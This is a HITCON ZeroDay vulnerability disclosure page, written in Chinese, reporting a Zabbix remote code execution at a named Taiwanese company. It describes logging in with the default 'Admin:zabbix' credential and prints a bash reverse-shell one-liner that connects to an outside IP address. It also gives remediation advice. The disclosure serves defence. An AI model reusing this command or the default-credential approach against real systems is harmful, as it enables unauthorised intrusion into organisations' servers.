易通台灣股份有限公司

Vulnerability Overview

ZDID: ZD-2023-00290
發信 Vendor: 數位通國際網路股份有限公司
Title: 易通台灣股份有限公司
Introduction: Zabbix RCE

處理狀態

目前狀態

公開

Last Update : 2023/08/19

新提交
已審核
已通報
未回報修補狀況
未複測
公開

處理歷程

2023/06/19 14:53:14 : 新提交 (由 Noth 更新此狀態)
2023/06/19 14:57:03 : 新提交 (由 Noth 更新此狀態)
2023/06/19 14:59:25 : 新提交 (由 Noth 更新此狀態)
2023/06/19 15:01:01 : 新提交 (由 Noth 更新此狀態)
2023/06/19 15:07:52 : 新提交 (由 Noth 更新此狀態)
2023/06/19 15:08:47 : 新提交 (由 Noth 更新此狀態)
2023/06/19 15:14:01 : 新提交 (由 Noth 更新此狀態)
2023/06/19 15:17:13 : 新提交 (由 Noth 更新此狀態)
2023/06/22 03:40:45 : 新提交 (由 Noth 更新此狀態)
2023/06/26 09:44:10 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2023/07/05 17:26:38 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2023/07/05 17:26:38 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2023/07/05 17:26:38 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2023/08/19 03:00:06 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2023-00290
通報者：shen (Noth)
風險：嚴重
類型：遠端命令執行 (Remote Code Execution)

參考資料

攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。

漏洞說明： OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection

漏洞說明： OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection

漏洞說明： CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html

漏洞說明： CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

透過 Fofa 搜尋 Zabbix 服務，發現此單位可用預設密碼成功登入。

Admin:zabbix

利用新建腳本常規方式，進行 Reverse shell。

bash -c "bash -i >& /dev/tcp/207.148.2.180/443 0>&1"

執行腳本，成功 Reverse Shell。

ifconfig。

測試腳本刪除，請排除日本 103.125.X.X 以及 207.148.2.180 IP，並無做進一步的動作，僅此證明。

whois ip。

修補建議

ㄧ. 改掉預設弱憑證
二. 設置白名單，限制存取 IP

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

易通台灣股份有限公司 - HITCON ZeroDay

Vulnerability Detail Report